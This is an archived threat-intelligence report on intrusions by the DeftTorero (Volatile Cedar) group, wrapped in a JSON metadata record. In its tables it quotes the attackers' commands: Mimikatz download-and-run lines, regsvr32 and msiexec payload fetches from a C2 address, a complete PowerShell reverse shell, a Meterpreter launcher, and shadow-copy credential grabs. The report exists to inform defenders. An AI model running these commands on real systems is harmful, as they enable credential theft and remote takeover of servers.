{ "id": "d319def0-f6c1-4fe2-98cd-cb98a6366115", "created_at": "2026-04-06T00:12:39.450903Z", "updated_at": "2026-04-10T03:31:32.865901Z", "deleted_at": null, "sha1_hash": "bb37f33f3495a1cf5949cd085ca8f958d88cfb38", "title": "DeftTorero: tactics, techniques and procedures of intrusions revealed", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 72597, "plain_text": "DeftTorero: tactics, techniques and procedures of intrusions\r\nrevealed\r\nBy GReAT\r\nPublished: 2022-10-03 · Archived: 2026-04-02 11:24:30 UTC\r\nEarlier this year, we started hunting for possible new DeftTorero (aka Lebanese Cedar, Volatile Cedar) artifacts.\r\nThis threat actor is believed to originate from the Middle East and was publicly disclosed to the cybersecurity\r\ncommunity as early as 2015. Notably, no other intelligence was shared until 2021, which led us to speculate on a\r\npossible shift by the threat actor to more fileless/LOLBINS techniques, and the use of known/common offensive\r\ntools publicly available on the internet that allows them to blend in.\r\nThe public reports available to date expose and discuss the final payload – Explosive RAT – and the webshells\r\nused in the initial foothold such as Caterpillar and ASPXSpy (you can find webshell MD5 hashes in the IoC\r\nsection), with little on the tactics, techniques and procedures (TTPs); this post focuses primarily on the TTPs used\r\nby the threat actor in intrusions between late 2019 and mid-2021 to compromise victims.\r\nMore information about DeftTorero is available to customers of Kaspersky Intelligence Reporting.\r\nContact us: intelreports@kaspersky.com\r\nInitial Access and webshell deployment\r\nDuring our intrusion analysis of DeftTorero’s webshells, such as Caterpillar, we noticed traces that infer the threat\r\nactor possibly exploited a file upload form and/or a command injection vulnerability in a functional or staging\r\nwebsite hosted on the target web server. This assumption is based on the fact that the uploaded webshells always\r\ndrop in the same web folder, and in some cases get assigned a name containing a GUID followed by the original\r\nwebshell filename.\r\nIn other instances, we noticed traces pointing to a possible exploitation of IIS PHP plugins pre-installed by the\r\nserver admins. And finally, in some other instances, we suspect the operators gained server credentials from other\r\nsystems in the same organization and logged in using a remote desktop (MSTSC.exe) to deploy the webshell.\r\nOnce the threat actor succeeds in identifying a method to upload a webshell, they attempt to drop several webshell\r\ntypes and families, most of which are blocked by the AV engine. We suspect that almost all the webshells dropped\r\n(including ASPXSpy, devilzshell, etc.) originate from a GitHub account, and are either used as is or are slightly\r\nmodified.\r\nDiscovery\r\nUpon successful installation of the webshell, the operators run multiple commands to gain situational awareness\r\nfrom the exploited system. This includes testing network connectivity by pinging Google.com, listing current\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 1 of 6\n\nfolders, identifying the current user privileges, enumerating local system users, and listing websites hosted by the\r\ncompromised server. The operators also attempt to assess if the web server is joined and/or trusted by any domain.\r\nAt a later stage, this will prove useful as it will inform them on the next course of actions for dumping local or\r\ndomain credentials.\r\nCommand Purpose\r\ncmd.exе /c whoаmi Identify user privileges\r\ncmd.exе /c аppcmd list site List the hosted websites on the web server\r\ncmd.exе /c nltеst\r\n/domain_trusts\r\nList domain controllers and enumerate domain trusts\r\ncmd.exе /с dir List current directories and files\r\ncmd.exе /c nеt view\r\nDisplay a list of domains, computers, or resources that are being shared by the\r\nspecified computer\r\ncmd.exе /c sеt Display the current environment variable settings\r\ncmd.exе /c systеminfo Display system profile and installed hotfixes\r\ncmd.exе /c ipconfig -\r\ndisplаydns\r\nDisplay DNS resolver cache\r\ncmd.exе /c ipconfig -аll Display network configuration on all network interfaces\r\ncmd.exе /c nеt user Display local users\r\ncmd.exе /c nеt user /domain Display domain users\r\ncmd.exе /c nеt use Display mapped drives to local system\r\ncmd.exе /c opеnfilеs Display files opened remotely\r\nTable. 1 Operator commands executed through webshell\r\nAfter gaining situational awareness, the operators attempt to load/invoke a number of tools to dump local and\r\ndomain credentials. In some cases, the threat actor attempts to install Nmap and Advanced Port Scanner, possibly\r\nto scan internal systems.\r\nDumping credentials\r\nCredential dumping methods differed from one case to another. In some instances, Lazagne.exe was used, in\r\nothers Mimikatz variants were used either by executing the respective PE binary or by invoking a base64-encoded\r\nPowerShell version from a GitHub project. In a smaller number of instances, possibly due to AV detection, the\r\noperators dumped the LSASS.exe process to disk, most probably to process it offline for credential dumping.\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 2 of 6\n\nCommand Comment\r\nIEX (New-Object\r\nNet.WebClient).DownloаdString(“httрs://raw.githubusercontеn\r\nt.com/BC-SECURITY/Empire/master/data/module_source/crеdentials/Invok\r\ne-Mimikatz.ps1”); Invoke-Mimikаtz -Command\r\nprivilеge::dеbug; Invoke-Mimikаtz -DumpCrеds;\r\nDecoded base64 command issued\r\nthrough webshell to invoke Mimikatz to\r\ndump passwords\r\nIEX (New-Object\r\nNet.WebClient).DownloаdString(‘httрs://raw.githubuserconten\r\nt.com/putterpаnda/mimikittеnz/master/Invoke-mimikittеnz.ps1’); Invoke-mimikittеnz\r\nDecoded base64 command issued\r\nthrough webshell to invoke Mimikittenz\r\nto dump passwords\r\nTable. 2 Operators invoking Mimikatz variants\r\nOnce credentials are obtained, it is believed the operators use Remote Desktop Protocol to pivot into internal\r\nsystems, or reachable systems that are likely using the stolen credentials (e.g., trusted partners). This is also\r\nreinforced by timeline analysis where the threat actor deployed a webshell at another web server in the same\r\nnetwork without exploiting a file upload form/vulnerability.\r\nThe many ways to achieve Execution\r\nFurther commands were executed to bypass the AV engine and establish a Meterpreter session with the operators’\r\nC2 server. After a Meterpreter session is established, the operators attempt to again invoke Mimikatz variants to\r\ngain system and/or domain credentials. It’s worth mentioning that in older intrusions, the threat actor deployed\r\nExplosive RAT instead of using Meterpreter.\r\nCommand Comment\r\ncmd.exе /c “regsvr32 /s /n /u /i:httр://200.159.87[.]196:3306/jsJ13j.sct\r\nscrobj.dll 2\u003e\u00261\r\nAlternative methods to\r\nachieve command execution\r\nwhile bypassing security\r\ncontrols using LOLBINs\r\nsuch as REGSVR32 and\r\nMSIEXEC\r\ncmd.exе /c “powershell -command “regsvr32 /s /n /u\r\n/i:httр://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll” 2\u003e\u00261\r\ncmd.exе /c “powershеll.exe -executionpolicy bypass -w hidden “iex(New-Object\r\nSystem.Net.WebClient).DownloadString(‘httр://200.159.87[.]196/made.ps1’)\r\n; made.ps1” 2\u003e\u00261\r\ncmd.exе /c “powershеll.exe -c “(New-Object\r\nSystem.NET.WеbClient).DownloadFile(‘httр://200.159.87[.]196/av.vbs’,\\”$e\r\nnv:temp\\av.vbs\\”);Start-Procеss %windir%\\system32\\cscript.exе\r\n\\”$env:temp\\av.vbs\\”” 2\u003e\u00261\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 3 of 6\n\ncmd.exe /c “powershеll.exe -executionpolicy bypass -w hidden “iex(New-Object\r\nSystem.Net.WebClient).DownloadString(‘httр://\u003cinternal_IP_address\u003e:8000/\r\nmade.ps1′); made.ps1″ 2\u003e\u00261\r\ncmd.exe /c “powershеll -nop -c “$client = New-Object\r\nSystem.Net.Sockets.TCPClient(‘200.159.87[.]196’,3306);$strеam =\r\n$client.GеtStream();[byte[]]$bytes = 0..65535|%{0};while(($i =\r\n$stream.Rеad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object –\r\nTypeName System.Text.ASCIIEncoding).GеtString($bytes,0, $i);$sendback\r\n=\r\n(iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + ‘PS ‘ +\r\n(pwd).Path + ‘\u003e ‘;$sеndbyte =\r\n([text.encoding]::ASCII).GеtBytes($sendback2);$strеam.Write($sendbyte,0,\r\n$sendbyte.Length);$stream.Flush()};$client.Close()” 2\u003e\u00261\r\ncmd.exe /c “msiеxec /q /i http://200.159.87[.]196/1.msi 2\u003e\u00261\r\ncmd.exe /c “Powershеll.exе -NoP -NonI -W Hidden -Exеc Bypass IEX (New-Object\r\nNet.WebClient).DownloadString(‘httрs://raw.githubusercontent[.]com/cheet\r\nz/PowerSploit/master/CodeExеcution/Invoke–Shellcode.ps1’); Invoke-Shellcode -Payload windows/metеrpreter/reverse_https -Lhost\r\n200.159.87[.]196 -Lport 3306 -Force 2\u003e\u00261\r\nPowerShell command to\r\ninvoke a Meterpreter session\r\nTable. 3 Operator commands to establish further presence on other servers in the same network\r\nCredentials: the more, the better\r\nWhile the same credential dumping strategy has been used by the operators in most intrusions, there were some\r\ninstances where few modifications were seen. For example, the operators used the VSSADMIN system tool to\r\ncreate a shadow copy snapshot on the targeted server in an attempt to dump domain credentials, a technique also\r\nused in pentesting and red team engagement.\r\nCommand Comment\r\nCMD /C vssаdmin create\r\nshadow /for=E:\r\nCreate a volume shadow copy to collect SAM and SYSTEM registry hives from\r\nlocal system, or NTDS.DIT and SYSTEM hives if on a domain controller\r\nCMD /C vssаdmin list\r\nshadows /for=E:\u003e\r\nTest if the above command worked\r\nTable. 4 Creating a shadow copy\r\nDefense Evasion: Explosive RAT modifications\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 4 of 6\n\nWe’ve barely seen Explosive RAT since 2019. However, it’s worth mentioning the tricks the author used in the\r\nversions that we know of. While the functionality of the malware didn’t change that much over time, the author\r\nmade an effort to ensure its files wouldn’t be detected using publicly available signatures. The changes introduced\r\nwere minimal but sufficient. The table below illustrates some changes made by the malware author. It is also\r\nnoticeable that some strings mentioned in previous Yara rules disappeared from the newer version.\r\nNew Pattern Old Pattern Pattern Description\r\nDOD DLD\r\nDelimiter used for malware\r\nconfiguration variables\r\nMozilla/5.0 (Windows NT 6.0;\r\nWOW64; rv:32.0) Gecko/20200101\r\nFirefox/32.0\r\nMozilla/4.0 (compatible; MSIE 7.0;\r\nMSIE 6.0; Windows NT 5.1; .NET\r\nCLR 2.0.50727)\r\nUser Agent for HTTP\r\nCommunication\r\nTable. 5 Pattern changes in the newer Explosive RAT campaign\r\nA second noticeable change made to evade defense was introduced to the function names exported by the DLL\r\ncomponent of Explosive RAT. Below is a list of changes in the export table.\r\nNew Function Name Old Function Name\r\nAllDataGet GetAllData\r\nHistoryGetIE GetIEHistory\r\nTOCN CON\r\nFnClipOpen OpenClipFn\r\nHoKSetWin SetWinHoK\r\nappregister Registerapp\r\nProcessPath PathProcess\r\nTable. 6 New function names compared to the old ones used in the 2015 campaign\r\nVictims\r\nBased on our telemetry, the indicators of the intrusions we assessed between late 2019 and mid-2021 are similar to\r\nthe usual DeftTorero victimology, with a clear focus on Middle Eastern countries such as Egypt, Jordan, Kuwait,\r\nLebanon, Saudi Arabia, Turkey and the United Arab Emirates.\r\nThe targeted web servers occasionally host multiple websites belonging to different industry verticals such as\r\nCorporate, Education, Government, Military, Media, and Telcos. This presents the threat actor with the\r\nopportunity to pivot to other victims of interest.\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 5 of 6\n\nConclusions\r\nIn this post, we described the potential tactics, techniques and procedures identified in previous DeftTorero\r\nintrusions that were largely missing from public reports. As our telemetry and public reports did not identify any\r\nnew Explosive RAT detections after 2020, but only old slightly modified toolsets (e.g., Explosive RAT, webshells,\r\netc.), the historical intrusions analysis we conducted suggest a potential TTP shift by the threat actor to more\r\nfileless/LOLBINS techniques, and the use of known/common offensive tools available on the internet. This TTP\r\nshift could explain the detection gap in previous years because using fileless techniques and public tools allows\r\nthe operators to blend in with other threat activities.\r\nThere are two recommended defensive measures to combat such intrusions, aside from assessing web\r\nvulnerabilities, namely, monitoring web server file integrity and occasionally scanning web server backups; we\r\nhave noticed that some of the threat actor post-exploitation tools were actually inside website backups, and\r\ncontinued to exist after the initial intrusion. If the backups were restored at a later stage, the threat actor could\r\nregain persistent access and continue where they left off.\r\nIf you want to learn more about DeftTorero activity and defense against this group, contact the Kaspersky\r\nIntelligence Reporting service at intelreports@kaspersky.com.\r\nIndicators of Compromise\r\nNote: We provide an incomplete list of IoCs here that are valid at the time of publication. A full IoC list is\r\navailable in our private report.\r\nFile hashes\r\nPost exploitation\r\nSource: https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/" ], "report_names": [ "107610" ], "threat_actors": [ { "id": "bc5c22a8-29eb-4a87-acd6-4817060e80f2", "created_at": "2022-10-25T15:50:23.658256Z", "updated_at": "2026-04-10T02:00:05.38013Z", "deleted_at": null, "main_name": "Volatile Cedar", "aliases": [ "Volatile Cedar", "Lebanese Cedar" ], "source_name": "MITRE:Volatile Cedar", "tools": [ "Caterpillar WebShell" ], "source_id": "MITRE", "reports": null }, { "id": "17b152bc-6f7e-463c-8b4c-a4844caea6df", "created_at": "2023-01-06T13:46:38.498795Z", "updated_at": "2026-04-10T02:00:03.000373Z", "deleted_at": null, "main_name": "Volatile Cedar", "aliases": [ "Lebanese Cedar", "DeftTorero" ], "source_name": "MISPGALAXY:Volatile Cedar", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5e7c75c6-097f-4d80-8c98-73485fe2a729", "created_at": "2022-10-25T16:07:24.386715Z", "updated_at": "2026-04-10T02:00:04.970172Z", "deleted_at": null, "main_name": "Volatile Cedar", "aliases": [ "Amethyst Rain", "Dancing Salome", "DeftTorero", "G0123", "VolcanicTimber" ], "source_name": "ETDA:Volatile Cedar", "tools": [ "ASPXSpy", "ASPXTool", "Adminer", "DirBuster", "GoBuster", "JuicyPotato", "RottenPotato", "SharPyShell" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434359, "ts_updated_at": 1775791892, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bb37f33f3495a1cf5949cd085ca8f958d88cfb38.pdf", "text": "https://archive.orkl.eu/bb37f33f3495a1cf5949cd085ca8f958d88cfb38.txt", "img": "https://archive.orkl.eu/bb37f33f3495a1cf5949cd085ca8f958d88cfb38.jpg" } }